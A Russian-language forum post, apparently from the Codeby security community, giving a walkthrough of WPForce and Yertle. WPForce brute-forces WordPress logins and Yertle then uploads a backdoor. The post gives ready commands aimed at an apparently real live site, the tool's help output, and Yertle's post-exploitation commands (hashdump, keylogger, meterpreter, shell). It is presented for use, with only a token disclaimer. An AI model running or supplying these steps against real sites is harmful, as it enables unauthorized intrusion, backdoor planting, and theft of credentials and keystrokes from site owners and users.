• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Soft WpForce - Брут-форс и эксплуатация Wordpress.

Screenshot from 2018-07-19 12-41-36.png
Всем привет. Представляю вам скрипт "WpForce". Предназначенный для Брут-форса и эксплуатации движка "Wordpress".
Разработчик -== n00py
Страница разработчика -== n00py/WPForce

Вся информация предназначена исключительно для ознакомления.

WPForce - Скрипт, который выполняет брут-форс аутентификации WordPress.
После удачного подбора учётных данных будем использовать "Yertle".
Yertle – может использоваться для выгрузки бэкдора на сервер с WordPress


Выполняем атаку на сайт.
Код:
Пример - python wpforce.py -i '/root/Desktop/ee' -w '/root/Desktop/44' -u http://www.superlovers.fr
python wpforce.py -i <Список логинов> -w <Список паролей> -u <Сайт>
Screenshot from 2018-07-19 12-49-08.png
В случае успеха мы увидим что-то наподобие -== admin : admin are valid credentials! - THIS ACCOUNT IS ADMIN.
Справка.

Код:
 -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input file name
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist file name
  -u URL, --url URL     URL of target
  -v, --verbose         Verbose output. Show the attemps as they happen.
  -t THREADS, --threads THREADS
                        Determines the number of threads to be used, default
                        is 10
  -a AGENT, --agent AGENT
                        Determines the user-agent
  -d, --debug           This option is used for determining issues with the
                        script.

После WPForce , используем скрипт "Yertle".
Screenshot from 2018-07-19 13-31-03.png

Вводим логин и пароль который Сбрутили.
Код:
Пример - python yertle.py -u admin -p admin -t http://www.superlovers.fr --interactive
python yertle.py -u логин -p пароль -t http://www.superlovers.fr --interactive
Screenshot from 2018-07-19 13-25-13.png
В случае успеха мы увидим - Backdoor uploaded!
Основные команды "Yertle".

beef
exit
hashdump
help
keylogger
keylog
meterpreter
quit
shell
stealth

Спасибо за внимание.
 
  • Нравится
Реакции: darklight и Vertigo
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!